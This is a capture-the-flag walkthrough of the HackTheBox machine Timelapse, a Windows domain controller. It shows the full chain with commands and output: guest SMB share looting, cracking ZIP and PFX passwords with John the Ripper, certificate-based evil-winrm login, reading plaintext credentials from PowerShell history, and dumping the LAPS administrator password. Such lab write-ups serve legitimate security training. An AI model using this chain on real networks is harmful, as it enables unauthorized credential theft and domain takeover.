Machine Overview
Timelapse is an easy-rated Windows Active Directory Domain Controller from HackTheBox. The machine focuses on SMB enumeration, certificate-based authentication via WinRM, and privilege escalation through LAPS (Local Administrator Password Solution). Initial access is gained by discovering a PFX certificate file in an exposed SMB share, cracking its password, and using it to authenticate via WinRM. Credentials are then discovered in PowerShell history files, leading to access as a service account with LAPS read permissions. Privilege escalation is achieved by reading the LAPS-managed local administrator password from Active Directory.
Enumeration
Network Scanning
We start by performing an Nmap scan to identify open ports and services:
nmap -A -p- -oN nmap.txt 10.10.11.152Scan Results:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-07 16:27:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2025-12-07T16:28:39+00:00; +8h00m22s from scanner time.
| tls-alpn:
|_ http/1.1
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49725/tcp open msrpc Microsoft Windows RPCLooking at the open ports, we can see that the machine is a AD Domain Controller.
$ netexec smb 10.10.11.152 -u guest -p '' --shares
SMB 10.10.11.152 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.10.11.152 445 DC01 [+] timelapse.htb\guest:
SMB 10.10.11.152 445 DC01 [*] Enumerated shares
SMB 10.10.11.152 445 DC01 Share Permissions Remark
SMB 10.10.11.152 445 DC01 ----- ----------- ------
SMB 10.10.11.152 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.152 445 DC01 C$ Default share
SMB 10.10.11.152 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.152 445 DC01 NETLOGON Logon server share
SMB 10.10.11.152 445 DC01 Shares READ
SMB 10.10.11.152 445 DC01 SYSVOL Logon server shareThe Shares share is accessible with guest authentication, let's explore it:
$ smbclient -N //10.10.11.152/Shares
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> lcd "Shares"
smb: \> mget *
getting file \Dev\winrm_backup.zip of size 2611 as Dev/winrm_backup.zip (28.3 KiloBytes/sec) (average 28.3 KiloBytes/sec)
getting file \HelpDesk\LAPS.x64.msi of size 1118208 as HelpDesk/LAPS.x64.msi (3269.5 KiloBytes/sec) (average 2581.5 KiloBytes/sec)
getting file \HelpDesk\LAPS_Datasheet.docx of size 104422 as HelpDesk/LAPS_Datasheet.docx (962.0 KiloBytes/sec) (average 2257.6 KiloBytes/sec)
getting file \HelpDesk\LAPS_OperationsGuide.docx of size 641378 as HelpDesk/LAPS_OperationsGuide.docx (3964.2 KiloBytes/sec) (average 2649.5 KiloBytes/sec)
getting file \HelpDesk\LAPS_TechnicalSpecification.docx of size 72683 as HelpDesk/LAPS_TechnicalSpecification.docx (755.1 KiloBytes/sec) (average 2421.8 KiloBytes/sec)We successfully downloaded several files. The most interesting file is winrm_backup.zip in the Dev directory.
Extracting and Cracking the ZIP Archive
The winrm_backup.zip file is password-protected. We use zip2john to extract the hash and crack it with John the Ripper:
zip2john winrm_backup.zip > hash
john --wordlist=`fzf-wordlists` hashCracked Password:
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)We extract the ZIP file using the password supremelegacy:
unzip winrm_backup.zipThis reveals a PFX certificate file: legacyy_dev_auth.pfx
What is a PFX file?
A PFX file (Personal Information Exchange) is used to store and transfer cryptographic information, including certificates and private keys, in a single encrypted file. It's commonly used for client authentication in secure communications.
Cracking the PFX Certificate Password
The PFX file itself is password-protected. We extract its hash and crack it:
pfx2john.py legacyy_dev_auth.pfx > pfx-hash
john --wordlist=`fzf-wordlists` pfx-hashCracked Password:
thuglegacy (legacyy_dev_auth.pfx)Extracting Certificate and Private Key
We extract the private key and certificate from the PFX file using OpenSSL:
# Extract encrypted private key
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key-enc
# Decrypt the private key
openssl rsa -in legacyy_dev_auth.key-enc -out legacyy_dev_auth.key
# Extract the certificate
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crtWe now have the private key (legacyy_dev_auth.key) and certificate (legacyy_dev_auth.crt) needed for certificate-based authentication.
Initial Access
Certificate-Based Authentication
We use the extracted certificate and private key to authenticate via WinRM:
$ evil-winrm -i 10.10.11.152 -S -k legacyy_dev_auth.key -c legacyy_dev_auth.crt
Evil-WinRM shell v3.7
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents>We have successfully authenticated as the legacyy user using certificate-based authentication.
User flag
C:\Users\legacyy\Desktop\user.txt
Discovering Credentials in PowerShell History
PowerShell stores command history in the ConsoleHost_history.txt file. We check this file for any exposed credentials:
cd $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\
type ConsoleHost_history.txtPowerShell History Contents:
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exitThe PowerShell history reveals credentials for the svc_deploy user: E3R$Q62^12p7PLlC%KWaxuaV
We authenticate using these credentials and SSL:
$ evil-winrm -i 10.10.11.152 -S -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV'
Evil-WinRM shell v3.7
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>Privilege Escalation
Enumerating User Privileges
We check the current user's group memberships and privileges:
$ whoami /all
USER INFORMATION
----------------
User Name SID
==================== ============================================
timelapse\svc_deploy S-1-5-21-671920749-559770252-3318990721-3103
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\LAPS_Readers Group S-1-5-21-671920749-559770252-3318990721-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
<...SNIP...>The user svc_deploy is a member of the LAPS_Readers group.
What is LAPS?
LAPS (Local Administrator Password Solution) is a Microsoft feature that manages local administrator account passwords for domain-joined computers. It stores these passwords in Active Directory, and members of the LAPS_Readers group can read the ms-mcs-admpwd attribute to retrieve the local administrator password for a specific computer.
Reading the LAPS Password
Since svc_deploy is a member of LAPS_Readers, we can query Active Directory to retrieve the LAPS-managed local administrator password for the DC01 computer:
$ Get-ADComputer DC01 -property 'ms-mcs-admpwd'
DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName : dc01.timelapse.htb
Enabled : True
ms-mcs-admpwd : &50jbBJ+N&RC(04r8}79I7,A ##
Name : DC01
ObjectClass : computer
ObjectGUID : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName : DC01$
SID : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName :We successfully retrieved the local administrator password: &50jbBJ+N&RC(04r8}79I7,A
Administrator Access
We use the LAPS password to authenticate as the Administrator:
$ evil-winrm -i 10.10.11.152 -S -u 'administrator' -p '&50jbBJ+N&RC(04r8}79I7,A'
Evil-WinRM shell v3.7
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>We now have a shell running as the Administrator user.
Root flag
The root flag is located at C:\Users\TRX\Desktop\root.txt (not in the Administrator's desktop).